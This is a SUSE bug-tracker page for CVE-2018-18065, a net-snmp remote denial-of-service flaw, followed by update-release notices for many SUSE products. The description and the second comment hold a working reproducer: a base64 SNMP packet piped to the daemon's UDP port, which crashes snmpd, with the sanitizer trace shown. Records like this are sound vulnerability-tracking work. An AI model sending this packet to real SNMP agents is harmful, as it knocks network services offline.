Bug 1111122 - (CVE-2018-18065) VUL-0: CVE-2018-18065: net-snmp: remote DoS (_set_key)
(CVE-2018-18065)
VUL-0: CVE-2018-18065: net-snmp: remote DoS (_set_key)
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/216309/
CVSSv3:SUSE:CVE-2018-18065:7.5:(AV:N/...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2018-10-08 21:55 UTC by Alexander Bergmann
Modified: 2022-03-21 17:18 UTC (History)
3 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Alexander Bergmann 2018-10-08 21:55:19 UTC
https://dumpco.re/blog/net-snmp-5.7.3-remote-dos

VULN#2 CVE-2018-18065
=====================

Second bug is also remotely exploitable but only with knowledge of the community string (in this case "public") leading to Denial of Service:

  # echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIuMzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQNMjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111

  # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln  127.0.0.1:1111
  ASAN:SIGSEGV
  =================================================================
  ==41062==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000410 (pc 0x00000075bc0f bp 0x7ffdda226b10 sp 0x7ffdda2269e0 T0)
      #0 0x75bc0e in _set_key /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564:9
      #1 0x75bc0e in _data_lookup /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:614
      #2 0x75bc0e in _container_table_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:749
      #3 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
      #4 0x572dc4 in netsnmp_call_next_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:640:12
      #5 0x58751c in table_helper_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table.c:713:9
      #6 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
      #7 0x572c79 in netsnmp_call_handlers /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:611:14
      #8 0x520d86 in handle_var_requests /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:2679:22
      #9 0x524dbe in handle_pdu /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3441:18
      #10 0x51b976 in netsnmp_handle_request /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3284:14
      #11 0x515876 in handle_snmp_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:1990:10
      #12 0x7f3558 in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5437:7
      #13 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
      #14 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
      #15 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
      #16 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
      #17 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
      #18 0x7fc1acb11b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
      #19 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)

  AddressSanitizer can not provide additional info.
  SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564 _set_key
  ==41062==ABORTING
Comment 2 Alexander Bergmann 2018-10-08 22:13:59 UTC
SLE-15 reproducer:

Just install net-snmp and use the default configuration.

Console 1:

#> snmpd -V -f -a -Lo

Console 2:

#> echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIu
MzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQN
MjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" \
| base64 -d > /dev/udp/127.0.0.1/161


Output on console 1:

NET-SNMP version 5.7.3
Connection from UDP: [127.0.0.1]:57142->[127.0.0.1]:161
Received SNMP packet(s) from UDP: [127.0.0.1]:57142->[127.0.0.1]:161
  GETNEXT message
    -- SNMPv2-SMI::enterprises.253.8.51.10.2.1.7.10.14130101
    -- SNMPv2-MIB::sysORUpTime.129.2.0.10.14130400
    -- ccitt.11.6.1.4.1.253.8.51.10.2.1.7.10.14130102
    -- SNMPv2-MIB::sysORTable.6.1.2.1.10.3.0.14130104
netsnmp_assert (((void *)0) != tblreq_info) && (tblreq_info->colnum <= tad->tblreg_info->max_column) failed helpers/table_container.c:606 _data_lookup()
Segmentation fault (core dumped)
Comment 3 Alexander Bergmann 2018-10-08 23:11:05 UTC
After fix is applied no netsnmp_assert will be triggered:

#> snmpd -V -f -a -Lo
NET-SNMP version 5.7.3
Connection from UDP: [127.0.0.1]:33362->[127.0.0.1]:161
Received SNMP packet(s) from UDP: [127.0.0.1]:33362->[127.0.0.1]:161
  GETNEXT message
    -- SNMPv2-SMI::enterprises.253.8.51.10.2.1.7.10.14130101
    -- SNMPv2-MIB::sysORUpTime.129.2.0.10.14130400
    -- ccitt.11.6.1.4.1.253.8.51.10.2.1.7.10.14130102
    -- SNMPv2-MIB::sysORTable.6.1.2.1.10.3.0.14130104
Comment 5 Swamp Workflow Management 2018-10-09 00:30:06 UTC
This is an autogenerated message for OBS integration:
This bug (1111122) was mentioned in
https://build.opensuse.org/request/show/640702 42.3 / net-snmp
https://build.opensuse.org/request/show/640703 15.0 / net-snmp
Comment 7 Swamp Workflow Management 2018-10-23 13:19:34 UTC
SUSE-SU-2018:3319-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1111122
CVE References: CVE-2018-18065
Sources used:
SUSE Linux Enterprise Server 12-LTSS (src):    net-snmp-5.7.2.1-4.9.1
Comment 8 Swamp Workflow Management 2018-10-23 16:17:15 UTC
SUSE-SU-2018:3333-1: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
SUSE Linux Enterprise Module for Basesystem 15 (src):    net-snmp-5.7.3-7.3.1
Comment 9 Swamp Workflow Management 2018-10-24 13:17:14 UTC
openSUSE-SU-2018:3381-1: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
openSUSE Leap 15.0 (src):    net-snmp-5.7.3-lp150.6.3.1
Comment 10 Swamp Workflow Management 2018-10-25 16:19:33 UTC
SUSE-SU-2018:3447-1: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
SUSE OpenStack Cloud 7 (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server 12-SP3 (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    net-snmp-5.7.3-6.3.1
SUSE Linux Enterprise Desktop 12-SP3 (src):    net-snmp-5.7.3-6.3.1
SUSE Enterprise Storage 4 (src):    net-snmp-5.7.3-6.3.1
SUSE CaaS Platform 3.0 (src):    net-snmp-5.7.3-6.3.1
Comment 11 Andreas Stieger 2018-10-26 18:28:00 UTC
done
Comment 12 Swamp Workflow Management 2018-10-26 22:18:36 UTC
openSUSE-SU-2018:3508-1: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
openSUSE Leap 42.3 (src):    net-snmp-5.7.3-7.3.1
Comment 13 Swamp Workflow Management 2019-04-27 22:25:57 UTC
SUSE-SU-2018:3447-2: An update that solves one vulnerability and has three fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1111122
CVE References: CVE-2018-18065
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    net-snmp-5.7.3-6.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 25 Swamp Workflow Management 2022-01-11 14:20:40 UTC
SUSE-SU-2022:0050-1: An update that solves two vulnerabilities, contains one feature and has 13 fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1108471,1111122,1116807,1140341,1145864,1152968,1174961,1178021,1178351,1179009,1179699,1181591
CVE References: CVE-2018-18065,CVE-2020-15862
JIRA References: SLE-6120
Sources used:
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    net-snmp-5.7.3-10.9.1
SUSE Enterprise Storage 6 (src):    net-snmp-5.7.3-10.9.1
SUSE CaaS Platform 4.0 (src):    net-snmp-5.7.3-10.9.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 26 Swamp Workflow Management 2022-01-11 14:23:06 UTC
openSUSE-SU-2022:0050-1: An update that solves two vulnerabilities, contains one feature and has 13 fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1108471,1111122,1116807,1140341,1145864,1152968,1174961,1178021,1178351,1179009,1179699,1181591
CVE References: CVE-2018-18065,CVE-2020-15862
JIRA References: SLE-6120
Sources used:
openSUSE Leap 15.3 (src):    net-snmp-5.7.3-10.9.1
Comment 27 Swamp Workflow Management 2022-02-25 14:18:02 UTC
openSUSE-SU-2022:0050-1: An update that fixes 21 vulnerabilities, contains one feature is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1108471,1111122,1116807,1140341,1145864,1152968,1174961,1178021,1178351,1179009,1179699,1181591
CVE References: CVE-2018-18065,CVE-2020-15862,CVE-2022-0452,CVE-2022-0453,CVE-2022-0454,CVE-2022-0455,CVE-2022-0456,CVE-2022-0457,CVE-2022-0458,CVE-2022-0459,CVE-2022-0460,CVE-2022-0461,CVE-2022-0462,CVE-2022-0463,CVE-2022-0464,CVE-2022-0465,CVE-2022-0466,CVE-2022-0467,CVE-2022-0468,CVE-2022-0469,CVE-2022-0470
JIRA References: SLE-6120
Sources used:
openSUSE Leap 15.3:NonFree (src):    opera-84.0.4316.14-lp153.2.36.1
openSUSE Leap 15.3 (src):    net-snmp-5.7.3-10.9.1
Comment 28 Swamp Workflow Management 2022-03-21 17:18:29 UTC
SUSE-SU-2022:0050-2: An update that solves two vulnerabilities, contains one feature and has 13 fixes is now available.

Category: security (important)
Bug References: 1027353,1081164,1102775,1108471,1111122,1116807,1140341,1145864,1152968,1174961,1178021,1178351,1179009,1179699,1181591
CVE References: CVE-2018-18065,CVE-2020-15862
JIRA References: SLE-6120
Sources used:
SUSE Manager Server 4.1 (src):    net-snmp-5.7.3-10.9.1
SUSE Manager Retail Branch Server 4.1 (src):    net-snmp-5.7.3-10.9.1
SUSE Manager Proxy 4.1 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server for SAP 15-SP2 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server 15-SP2-LTSS (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Server 15-SP2-BCL (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise Realtime Extension 15-SP2 (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (src):    net-snmp-5.7.3-10.9.1
SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (src):    net-snmp-5.7.3-10.9.1
SUSE Enterprise Storage 7 (src):    net-snmp-5.7.3-10.9.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.